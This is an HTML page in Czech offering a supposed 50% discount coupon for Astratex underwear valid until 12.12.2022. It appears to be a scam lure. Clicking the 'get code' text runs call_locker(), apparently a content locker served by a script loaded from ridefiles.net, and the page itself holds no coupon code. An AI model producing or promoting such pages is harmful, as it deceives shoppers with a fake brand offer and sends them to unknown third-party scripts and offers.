<!DOCTYPE html>
<html>
    <head>
        <script type="text/javascript" src="https://ridefiles.net/script_include.php?id=1198978"></script>
         <title>Astratex sleva 50%</title>
         <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=PT+Sans:wght@400;700&display=swap" rel="stylesheet">
         <style>
            .topnav {
  background-color: black;
  overflow: hidden; }
  .topnav a {
  float: left;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
  font-family: 'PT Sans', sans-serif;
}
.topnav a:hover {
  background-color: #ddd;
  color: black;
}
.topnav a.active {
  background-color: #ed6660;
  color: white;
}
.prvni-text{
    font-family: 'PT Sans', sans-serif;
    text-align: center;
    font-size: 25px;

}
.kupon{
    height: 200px;
    width: 400px;
    border-style: dashed;
    border-color: #DAA520;
    background-color: black;
    margin-top: 50px;
    margin-left: 440px;
    
    
}
.kupon-text{
    font-family: 'PT Sans', sans-serif;
text-align: center;
margin-top: 10px;
font-style: italic;
color: white;
}
.odkaz-text{
    font-family: 'PT Sans', sans-serif;
font-weight: bolder;
text-align: center;
margin-top: 80px;
  text-decoration: underline;
  color: white;
  cursor: pointer;
  font-size: 20px;
  

}
.footer {
  position: fixed;
  left: 0;
  bottom: 0;
  width: 100%;
  background-color: black;
  color: white;
  text-align: center;
}
         </style>
        </head>
    <body>
        <div class="topnav">
            <a class="active" href="#home">Domů</a>
            <a href="#news">Novinky</a>
            <a href="#contact">Kontakt</a>
            <a href="#about">O nás</a>
          </div>
          <h1 class="prvni-text">
            Uplatněte slevu 50% na spodní prádlo Astratex. Tuto slevu lze 
            využít na jakékoliv spodní prádlo do částky 1999 kč. 
          </h1>
          <div class="kupon">
            <div class="kupon-text">
                Slevový Kupón 50% je platný do 12.12.2022 na jakékoliv zboží
internetového obchodu Astratex. Slevu lze uplatnit do částky nákupu 1999 kč.

            </div>
            <div class="odkaz-text">
<p onclick="call_locker();">
    KLINĚTE ZDE PRO ZÍSKÁNÍ KÓDU>>
</p>
            </div>
          </div>
          <div class="footer">
            <p>Slevy a Akce. Všechna práva vyhrazena 2022 &#8482;</p>
          </div>
    </body>
    
</html>